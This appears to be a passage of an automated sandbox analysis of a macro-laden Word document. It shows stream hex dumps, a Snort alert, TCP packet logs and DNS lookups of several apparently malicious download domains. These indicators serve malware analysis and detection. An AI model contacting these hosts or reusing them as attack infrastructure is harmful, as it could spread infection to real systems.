                                        File Type:data
                                        Stream Size:5224
                                        Entropy:5.5041300643
                                        Base64 Encoded:True
                                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                        Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 670
                                        General
                                        Stream Path:Macros/VBA/dir
                                        File Type:data
                                        Stream Size:670
                                        Entropy:6.43897053938
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . T . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
                                        Data Raw:01 9a b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 b7 54 e4 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                        Stream Path: WordDocument, File Type: data, Stream Size: 21038
                                        General
                                        Stream Path:WordDocument
                                        File Type:data
                                        Stream Size:21038
                                        Entropy:4.0974939161
                                        Base64 Encoded:True
                                        Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . - L . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . b . . . b . . . - D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 2d 4c 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 52 00 00 62 7f 00 00 62 7f 00 00 2d 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        01/07/21-18:36:11.466200TCP1201ATTACK-RESPONSES 403 Forbidden8049169173.255.195.246192.168.2.22

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 7, 2021 18:36:10.261313915 CET4916780192.168.2.2289.252.164.58
                                        Jan 7, 2021 18:36:10.346086025 CET804916789.252.164.58192.168.2.22
                                        Jan 7, 2021 18:36:10.346206903 CET4916780192.168.2.2289.252.164.58
                                        Jan 7, 2021 18:36:10.348764896 CET4916780192.168.2.2289.252.164.58
                                        Jan 7, 2021 18:36:10.430490971 CET804916789.252.164.58192.168.2.22
                                        Jan 7, 2021 18:36:10.431408882 CET804916789.252.164.58192.168.2.22
                                        Jan 7, 2021 18:36:10.435518026 CET4916780192.168.2.2289.252.164.58
                                        Jan 7, 2021 18:36:10.527239084 CET804916789.252.164.58192.168.2.22
                                        Jan 7, 2021 18:36:10.534745932 CET804916789.252.164.58192.168.2.22
                                        Jan 7, 2021 18:36:10.534810066 CET804916789.252.164.58192.168.2.22
                                        Jan 7, 2021 18:36:10.534853935 CET804916789.252.164.58192.168.2.22
                                        Jan 7, 2021 18:36:10.534890890 CET804916789.252.164.58192.168.2.22
                                        Jan 7, 2021 18:36:10.534928083 CET804916789.252.164.58192.168.2.22
                                        Jan 7, 2021 18:36:10.534961939 CET804916789.252.164.58192.168.2.22
                                        Jan 7, 2021 18:36:10.534985065 CET4916780192.168.2.2289.252.164.58
                                        Jan 7, 2021 18:36:10.535024881 CET4916780192.168.2.2289.252.164.58
                                        Jan 7, 2021 18:36:10.535372972 CET804916789.252.164.58192.168.2.22
                                        Jan 7, 2021 18:36:10.535453081 CET4916780192.168.2.2289.252.164.58
                                        Jan 7, 2021 18:36:10.620301008 CET4916880192.168.2.2266.153.205.191
                                        Jan 7, 2021 18:36:10.774282932 CET804916866.153.205.191192.168.2.22
                                        Jan 7, 2021 18:36:10.774382114 CET4916880192.168.2.2266.153.205.191
                                        Jan 7, 2021 18:36:10.774549007 CET4916880192.168.2.2266.153.205.191
                                        Jan 7, 2021 18:36:10.933862925 CET804916866.153.205.191192.168.2.22
                                        Jan 7, 2021 18:36:10.933907986 CET804916866.153.205.191192.168.2.22
                                        Jan 7, 2021 18:36:10.934144974 CET4916880192.168.2.2266.153.205.191
                                        Jan 7, 2021 18:36:11.132230997 CET4916980192.168.2.22173.255.195.246
                                        Jan 7, 2021 18:36:11.298903942 CET8049169173.255.195.246192.168.2.22
                                        Jan 7, 2021 18:36:11.299201012 CET4916980192.168.2.22173.255.195.246
                                        Jan 7, 2021 18:36:11.299278021 CET4916980192.168.2.22173.255.195.246
                                        Jan 7, 2021 18:36:11.465089083 CET8049169173.255.195.246192.168.2.22
                                        Jan 7, 2021 18:36:11.466200113 CET8049169173.255.195.246192.168.2.22
                                        Jan 7, 2021 18:36:11.466224909 CET8049169173.255.195.246192.168.2.22
                                        Jan 7, 2021 18:36:11.466447115 CET4916980192.168.2.22173.255.195.246
                                        Jan 7, 2021 18:36:11.467278957 CET4916980192.168.2.22173.255.195.246
                                        Jan 7, 2021 18:36:11.633071899 CET8049169173.255.195.246192.168.2.22
                                        Jan 7, 2021 18:36:11.901504993 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.061923981 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.062169075 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.062374115 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.222413063 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.229958057 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.230010033 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.230046988 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.230084896 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.230122089 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.230169058 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.230173111 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.230211020 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.230232000 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.230241060 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.230249882 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.230292082 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.230329990 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.230330944 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.230410099 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.390563965 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.390620947 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.390662909 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.390698910 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.390737057 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.390774012 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.390779018 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.390810013 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.390821934 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.390827894 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.390853882 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.390897036 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.390937090 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.390944004 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.390974045 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.391005039 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.391010046 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.391057968 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.391072989 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.391099930 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.391113997 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.391165018 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.551418066 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551470995 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551513910 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551552057 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551579952 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.551589966 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551626921 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.551654100 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551702976 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551726103 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.551744938 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551783085 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551810026 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.551820040 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551858902 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.551860094 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551898003 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551932096 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.551934958 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551973104 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.551995039 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.552021027 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.552062988 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.552098036 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.552124023 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.552136898 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.552170038 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.552175999 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.552213907 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.552254915 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.552263975 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.552303076 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.552328110 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.552689075 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.712605000 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.712652922 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.712690115 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.712738037 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.712780952 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.712817907 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.712858915 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.712871075 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.712898016 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.712918043 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.712935925 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.712973118 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.712974072 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713011980 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713048935 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713059902 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713103056 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713128090 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713140011 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713177919 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713203907 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713215113 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713252068 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713283062 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713289022 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713327885 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713355064 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713376045 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713443995 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713454962 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713484049 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713520050 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713548899 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713557959 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713597059 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713604927 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713644028 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713660955 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713687897 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713725090 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713751078 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713762999 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713800907 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713825941 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713838100 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713876963 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713913918 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.713921070 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713968992 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.713985920 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.714975119 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.874241114 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874306917 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874368906 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874425888 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874481916 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874540091 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874564886 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.874589920 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874618053 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.874634027 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874681950 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874687910 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.874737024 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874753952 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.874794960 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874855995 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874872923 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.874907017 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874963045 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.874980927 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.875025034 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875081062 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875097036 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.875196934 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875253916 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875263929 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.875319004 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875380993 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875389099 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.875435114 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875483990 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875503063 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.875540972 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875596046 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875606060 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.875655890 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875711918 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875718117 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.875777006 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875830889 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875840902 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.875889063 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.875936031 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.875947952 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876007080 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876018047 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.876063108 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876121044 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876127958 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.876171112 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876236916 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876236916 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.876297951 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876353979 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876363039 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.876410961 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876463890 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876475096 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.876514912 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876554012 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876583099 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.876590967 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876650095 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876655102 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.876708984 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876755953 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876773119 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.876812935 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876861095 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876880884 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.876924992 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:12.876985073 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:12.877665997 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:13.037360907 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037450075 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037493944 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037530899 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037569046 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037605047 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037652969 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037694931 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037724018 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:13.037731886 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037770033 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:13.037770987 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037798882 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:13.037810087 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037823915 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:13.037847042 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037889004 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037925959 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037930965 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:13.037972927 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.037995100 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:13.038016081 CET8049170103.92.235.25192.168.2.22
                                        Jan 7, 2021 18:36:13.038083076 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:13.039115906 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:13.364142895 CET4916880192.168.2.2266.153.205.191
                                        Jan 7, 2021 18:36:13.364172935 CET4917080192.168.2.22103.92.235.25
                                        Jan 7, 2021 18:36:13.364545107 CET4916780192.168.2.2289.252.164.58
                                        Jan 7, 2021 18:36:34.684778929 CET4917180192.168.2.225.2.136.90
                                        Jan 7, 2021 18:36:34.756763935 CET80491715.2.136.90192.168.2.22
                                        Jan 7, 2021 18:36:34.756901979 CET4917180192.168.2.225.2.136.90
                                        Jan 7, 2021 18:36:34.758904934 CET4917180192.168.2.225.2.136.90
                                        Jan 7, 2021 18:36:34.758992910 CET4917180192.168.2.225.2.136.90
                                        Jan 7, 2021 18:36:34.831490040 CET80491715.2.136.90192.168.2.22
                                        Jan 7, 2021 18:36:34.831592083 CET4917180192.168.2.225.2.136.90
                                        Jan 7, 2021 18:36:34.905512094 CET80491715.2.136.90192.168.2.22
                                        Jan 7, 2021 18:36:34.905683994 CET4917180192.168.2.225.2.136.90
                                        Jan 7, 2021 18:36:34.977557898 CET80491715.2.136.90192.168.2.22
                                        Jan 7, 2021 18:36:35.483923912 CET80491715.2.136.90192.168.2.22
                                        Jan 7, 2021 18:36:35.484208107 CET4917180192.168.2.225.2.136.90
                                        Jan 7, 2021 18:36:35.484641075 CET80491715.2.136.90192.168.2.22
                                        Jan 7, 2021 18:36:35.484746933 CET4917180192.168.2.225.2.136.90
                                        Jan 7, 2021 18:37:40.480453014 CET80491715.2.136.90192.168.2.22
                                        Jan 7, 2021 18:37:40.480637074 CET4917180192.168.2.225.2.136.90

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 7, 2021 18:36:10.144685984 CET5219753192.168.2.228.8.8.8
                                        Jan 7, 2021 18:36:10.249505997 CET53521978.8.8.8192.168.2.22
                                        Jan 7, 2021 18:36:10.555039883 CET5309953192.168.2.228.8.8.8
                                        Jan 7, 2021 18:36:10.618753910 CET53530998.8.8.8192.168.2.22
                                        Jan 7, 2021 18:36:10.955595970 CET5283853192.168.2.228.8.8.8
                                        Jan 7, 2021 18:36:11.131052017 CET53528388.8.8.8192.168.2.22
                                        Jan 7, 2021 18:36:11.478858948 CET6120053192.168.2.228.8.8.8
                                        Jan 7, 2021 18:36:11.900259018 CET53612008.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Jan 7, 2021 18:36:10.144685984 CET192.168.2.228.8.8.80x51f2Standard query (0)hangarlastik.comA (IP address)IN (0x0001)
                                        Jan 7, 2021 18:36:10.555039883 CET192.168.2.228.8.8.80x4aa4Standard query (0)padreescapes.comA (IP address)IN (0x0001)
                                        Jan 7, 2021 18:36:10.955595970 CET192.168.2.228.8.8.80x70c0Standard query (0)sarture.comA (IP address)IN (0x0001)
                                        Jan 7, 2021 18:36:11.478858948 CET192.168.2.228.8.8.80x3714Standard query (0)seo.udaipurkart.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Jan 7, 2021 18:36:10.249505997 CET8.8.8.8192.168.2.220x51f2No error (0)hangarlastik.com89.252.164.58A (IP address)IN (0x0001)
